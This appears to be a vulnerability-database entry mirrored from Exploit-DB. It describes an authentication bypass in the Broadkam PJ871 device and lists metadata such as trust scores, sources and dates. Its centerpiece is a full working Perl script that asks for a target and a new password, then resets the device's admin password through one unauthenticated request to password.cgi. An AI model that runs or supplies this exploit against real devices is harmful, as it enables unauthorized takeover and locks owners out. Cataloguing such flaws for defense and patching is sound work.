Details of VAR-E-201307-0524

ID

VAR-E-201307-0524

EDB ID

27134

TITLE

Broadkam PJ871 - Authentication Bypass - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 27134

DESCRIPTION

Broadkam PJ871 - Authentication Bypass. CVE-95777 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 27134

AFFECTED PRODUCTS

vendor:

broadkam

model:

pj871

scope:

version:

Trust: 1.6

sources: EXPLOIT-DB: 27134 // EDBNET: 49022

EXPLOIT

#!/usr/bin/perl
#d3c0der

use HTTP::Request;
use LWP::UserAgent;

print "= Target : ";
$ip=<STDIN>;
chomp $ip;
print "= new password : ";
$npass=<STDIN>;
chomp $npass;

if ( $ip !~ /^http:/ ) {
$ip = 'http://' . $ip;
}
if ( $ip !~ /\/$/ ) {
$ip = $ip . '/';
}
print "\n";

print "->attacking , plz wait ! : $ip\n";

@path1=("password.cgi?sysPassword=$npass");

foreach $ways(@path1){

$final=$ip.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

}

print "[-] password changed to $npass \n";

Trust: 1.0

sources: EXPLOIT-DB: 27134

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 27134

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 27134

TYPE

Authentication Bypass

Trust: 1.6

sources: EXPLOIT-DB: 27134 // EDBNET: 49022

CREDITS

d3c0der

Trust: 0.6

sources: EXPLOIT-DB: 27134

EXTERNAL IDS

db:	EXPLOIT-DB	id:	27134	Trust: 1.6
db:	EDBNET	id:	49022	Trust: 0.6

sources: EXPLOIT-DB: 27134 // EDBNET: 49022

REFERENCES

url:

https://www.exploit-db.com/exploits/27134/

Trust: 0.6

sources: EDBNET: 49022

SOURCES

db:	EXPLOIT-DB	id:	27134
db:	EDBNET	id:	49022

LAST UPDATE DATE

2022-07-27T09:49:47.740000+00:00

SOURCES RELEASE DATE

db:	EXPLOIT-DB	id:	27134	date:	2013-07-27T00:00:00
db:	EDBNET	id:	49022	date:	2013-07-27T00:00:00